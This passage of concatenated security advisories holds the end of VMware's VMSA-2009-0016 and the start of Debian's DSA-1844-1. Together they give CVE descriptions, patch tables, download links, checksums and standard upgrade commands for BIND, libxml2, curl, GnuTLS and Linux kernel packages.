pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    Patch 2\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n g. Updated Service Console package bind\n\n    Service Console package bind updated to version 9.3.6-4.P1.el5\n\n    The Berkeley Internet Name Domain (BIND) is an implementation of the\n    Domain Name System (DNS) protocols. BIND includes a DNS server\n    (named); a resolver library (routines for applications to use when\n    interfacing with DNS); and tools for verifying that the DNS server\n    is operating correctly. \n\n    A flaw was found in the way BIND handles dynamic update message\n    packets containing the \"ANY\" record type. A remote attacker could\n    use this flaw to send a specially-crafted dynamic update packet\n    that could cause named to exit with an assertion failure. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2009-0696 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-200911237-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    Patch 2\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n h. Updated Service Console package libxml2\n\n    Service Console package libxml2 updated to version 2.6.26-2.1.2.8. \n\n    libxml is a library for parsing and manipulating XML files. A\n    Document Type Definition (DTD) defines the legal syntax (and also\n    which elements can be used) for certain types of files, such as XML\n    files. \n\n    A stack overflow flaw was found in the way libxml processes the\n    root XML document element definition in a DTD. A remote attacker\n    could provide a specially-crafted XML file, which once opened by a\n    local, unsuspecting user, would lead to denial of service. \n\n    Multiple use-after-free flaws were found in the way libxml parses\n    the Notation and Enumeration attribute types. A remote attacker\n    could provide a specially-crafted XML file, which once opened by a\n    local, unsuspecting user, would lead to denial of service. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-2414 and CVE-2009-2416 to these\n    issues. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-200911234-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    Patch 2\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n i. Updated Service Console package curl\n\n    Service Console package curl updated to version 7.15.5-2.1.el5_3.5\n\n    A cURL is affected by the previously published \"null prefix attack\",\n    caused by incorrect handling of NULL characters in X.509\n    certificates. If an attacker is able to get a carefully-crafted\n    certificate signed by a trusted Certificate Authority, the attacker\n    could use the certificate during a man-in-the-middle attack and\n    potentially confuse cURL into accepting it by mistake. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2009-2417 to this issue\n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-200911232-SG\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 2\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n j. Updated Service Console package gnutls\n\n    Service Console package gnutil updated to version 1.4.1-3.el5_3.5\n\n    A flaw was discovered in the way GnuTLS handles NULL characters in\n    certain fields of X.509 certificates. If an attacker is able to get\n    a carefully-crafted certificate signed by a Certificate Authority\n    trusted by an application using GnuTLS, the attacker could use the\n    certificate during a man-in-the-middle attack and potentially\n    confuse the application into accepting it by mistake. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2009-2730 to this issue\n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-200911233-SG\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 2\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum of your downloaded file. \n\n\n   VMware vCenter Server 4 Update 1\n   --------------------------------\n   Version       4.0 Update 1\n   Build Number  208156\n   Release Date  2009/11/19\n   Type          Product Binaries\n   http://downloads.vmware.com/download/download.do?downloadGroup=VC40U1\n\n   VMware vCenter Server 4 and modules\n   File size: 1.8 GB\n   File type: .iso\n   MD5SUM: 057d55b32eb27fe5f3e01bc8d3df3bc5\n   SHA1SUM: c90134418c2e4d3d6637d8bee44261300ad95ec1\n\n   VMware vCenter Server 4 and modules\n   File size: 1.5 GB\n   File type: .zip\n   MD5SUM: f843d9c19795eb3bc5a77f5c545468a8\n   SHA1SUM: 9a7abd8e70bd983151e2ee40e1b3931525c4480c\n\n   VMware vSphere Client and Host Update Utility\n   File size: 113.8 MB\n   File type: .exe\n   MD5SUM: 6cc6b2c958e7e9529c284e48dfae22a9\n   SHA1SUM: f4c19c63a75d93cffc57b170066358160788c959\n\n   VMware vCenter Converter BootCD\n   File size: 98.8 MB\n   File type: .zip\n   MD5SUM: 3df94eb0e93de76b0389132ada2a3799\n   SHA1SUM: 5d7c04e4f9f8ae25adc8de5963fefd8a4c92464c\n\n   VMware vCenter Converter CLI (Linux)\n   File size: 36.9 MB\n   File type: .tar.gz\n   MD5SUM: 3766097563936ba5e03e87e898f6bd48\n   SHA1SUM: 36d485bdb5eb279296ce8c8523df04bfb12a2cb4\n\n\n   ESXi 4.0 Update 1\n   -----------------\n   ESXi400-200911201-UG\n\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-155-20091116-013169/ESXi-4.0.0-update01.zip\n   md5sum:c6fdd6722d9e5cacb280bdcc2cca0627\n   sha1sum:de9d4875f86b6493f9da991a8cff37784215db2e\n   http://kb.vmware.com/kb/1014886\n\n   NOTE: The three ESXi patches for Firmware, VMware Tools, and the\n         VI Client \"C\" are contained in a single download file. \n\n\n   ESX 4.0 Update 1\n   ----------------\n\nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-158-20091118-187517/ESX-4.0.0-update01.zip\n   md5sum: 68934321105c34dcda4cbeeab36a2b8f\n   sha1sum: 0d8ae58cf9143d5c7113af9692dea11ed2dd864b\n   http://kb.vmware.com/kb/1014842\n\n   To install an individual bulletin use esxupdate with the -b option. \n   esxupdate --bundle=ESX-4.0.0-update01.zip -b ESX400-200911223-UG\n   -b ESX400-200911238-SG -b ESX400-200911201-UG -b ESX400-200911235-SG\n   -b ESX400-200911237-SG -b ESX400-200911234-SG -b ESX400-200911232-SG\n   -b ESX400-200911233-SG update\n\n\n5. References\n\n   CVE numbers\n   --- JRE ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1094\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1095\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1096\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1098\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1100\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1101\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1102\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1103\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1104\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1105\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1106\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1107\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2670\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2671\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2672\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2673\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2675\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2676\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2716\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2718\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2719\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2721\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2722\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2723\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2724\n   --- Tomcat ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5515\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0033\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0580\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0781\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0783\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0002\n   --- ntp ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159\n   --- kernel ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3528\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5700\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0028\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0322\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0778\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4307\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0834\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1337\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0787\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1336\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1439\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1633\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1072\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1630\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1192\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5966\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1389\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1895\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2406\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2407\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0745\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0746\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0747\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0748\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2847\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2848\n   --- python ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031\n   --- bind ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696\n   --- libxml and libxml2 ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2414\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416\n   --- curl --\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2417\n   --- gnutil ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2052\n\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2009-11-20  VMSA-2009-0016\nInitial security advisory after release of vCenter 4.0 Update 1 and\nESX 4.0 Update 1 on 2009-11-19 and release of vMA Patch 2 on 2009-11-23. \n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/lifecycle/\n\nCopyright 2009 VMware Inc.  All rights reserved. \n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.0.11 (GNU/Linux)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\n\niEYEARECAAYFAksHAooACgkQS2KysvBH1xmQMACfTEcnuPanvucXPmgJCTT054o+\ndtoAniXz+9xLskrkPr3oUzAcDeV729WG\n=wSRz\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1844-1                security@debian.org\nhttp://www.debian.org/security/                           Dann Frazier\nJuly 28, 2009                       http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6.24\nVulnerability  : denial of service/privilege escalation\nProblem type   : local/remote\nDebian-specific: no\nCVE Id(s)      : CVE-2009-1385 CVE-2009-1389 CVE-2009-1630 CVE-2009-1633\n                 CVE-2009-1895 CVE-2009-1914 CVE-2009-1961 CVE-2009-2406\n                 CVE-2009-2407\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation. \n\nCVE-2009-1895\n\n    Julien Tinnes and Tavis Ormandy reported and issue in the Linux\n    vulnerability code. Local users can take advantage of a setuid\n    binary that can either be made to dereference a NULL pointer or\n    drop privileges and return control to the user. \n\nCVE-2009-1961\n\n    Miklos Szeredi reported an issue in the ocfs2 filesystem. \n    \nCVE-2009-2406\nCVE-2009-2407\n\n    Ramon de Carvalho Valle discovered two issues with the eCryptfs\n    layered filesystem using the fsfuzzer utility. \n    \nFor the stable distribution (etch), these problems have been fixed in\nversion 2.6.24-6~etchnhalf.8etch2. \n\nWe recommend that you upgrade your linux-2.6.24 packages. \n\nNote: Debian \u0027etch\u0027 includes linux kernel packages based upon both the\n2.6.18 and 2.6.24 linux releases.  All known security issues are\ncarefully tracked against both packages and both packages will receive\nsecurity updates until security support for Debian \u0027etch\u0027\nconcludes. However, given the high frequency at which low-severity\nsecurity issues are discovered in the kernel and the resource\nrequirements of doing an update, lower severity 2.6.18 and 2.6.24\nupdates will typically release in a staggered or \"leap-frog\" fashion. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch2.diff.gz\n    Size/MD5 checksum:  4046697 0c540aa51d64fd0f41fefda0370a7d57\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch2.dsc\n    Size/MD5 checksum:     5117 8149bb152305e615760fd5accc516b17\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz\n    Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb\n    Size/MD5 checksum:   931690 8230f79880ab579b104e9b34029cc97d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb\n    Size/MD5 checksum:  1572166 59bdbfc8850a9eb4c7f09229f8481a04\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb\n    Size/MD5 checksum: 46892520 c736086affec0e829b80074008edc96d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.8etch2_all.deb\n    Size/MD5 checksum:    97696 ac7c8e4af4d15f8e77817f3a2060621e\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb\n    Size/MD5 checksum:  4469630 76391a2afe93b14ef942260a2ab0f6c4\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.8etch2_all.deb\n    Size/MD5 checksum:    82766 fccf13a8baefeb96443c00718b47178a\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum: 26737560 705e6c1f456e523e4cd6e2199247ad8a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum: 27342178 b22b7be9f15a3fcd569e83b0981c7b2b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum:  3454340 5d9c4195f523265e691a73d165a32bd5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum:   331144 9b199341a9906f69b92956bee989678f\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum:   330548 2e97270481c6406f4703f7ffc642a306\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum:    82254 6ef54422427a87fb7013208abbb90bfe\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum: 26758348 3fa44a2c192d5296abff11160c4143f7\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum:    82234 2d73cbb156467a0e189b66d64d725957\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch2_alpha.deb\n    Size/MD5 checksum:   332176 8abd6e28989d5ffa359dbdf523b8802a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_amd64.deb\n    Size/MD5 checksum:    82232 f31859776e8c538793ce7bc12e4d16e6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb\n    Size/MD5 checksum:    82238 0dd51e0668293dc4a112ba7c177a2d62\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb\n    Size/MD5 checksum:   355216 e912a184ffa55eefcbf4d075575f956b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_amd64.deb\n    Size/MD5 checksum:  3649934 25d6d6f81163cd422b987cffe8555482\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch2_amd64.deb\n    Size/MD5 checksum: 19596152 128c3dcd4b54fbca2a8cccf553b15c15\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum:   308764 081a21f64a1939858fd628b2b17b1e9d\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum:    82362 a02c06864fb8adb347c7b3b83707ec71\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum:  3937452 4296fde893b88cba41a5164cd6c68266\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum:   297832 882e93119837e060496995474bfbde0c\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum:    82388 5682b9cb3c9efdf951541c5e951858d5\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum:  9356202 12691f5684650f5f808b4ccc3d77e6f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum: 10777668 be1c3aa597e81f449a1712c059b6d219\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum: 10786276 fdfef0d9f0a0f740cdf096efe4076849\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch2_arm.deb\n    Size/MD5 checksum:   306278 243cc2aef642ad3dc3e6faa9f5b7d2ac\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum:   259166 403c84cc8eec53736e11babcd7133c36\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum:    82390 c1e6ec2b43d6dc4849ab58fcca7708fd\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum:   257800 dcf392b46aaabf4187d0b739d7b3f0b6\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum:    82356 e67f07544c8505aebf46d0fc5cc6ff9b\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum:   258558 a2e28e8a24b42aa4f092218fdb7b24b0\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum: 14371812 91a757a164d87fcca9b7c8dcf9737e52\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum:   261468 72a0d875029ef878bcfa7734ad0e3221\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum:  3444724 e4cbc7652241146662a324980caf28e8\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum: 14830286 ee2c1dd21c02e82c845897b92fc44d18\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum: 13846760 3133b7187049be153f3d946556c58d5a\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch2_hppa.deb\n    Size/MD5 checksum: 13335008 a71482e5f95d01ae60ef6f9e84851905\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum: 19345260 c8d133c7df467610a2b58b02d437f140\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum: 19349370 99465914e158a8a8095d704c7a4eca58\n  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch2_i386.deb\n    Size/MD5 checksum:    82350 eb75675cf418a8fe18a45cf78e113b14\n  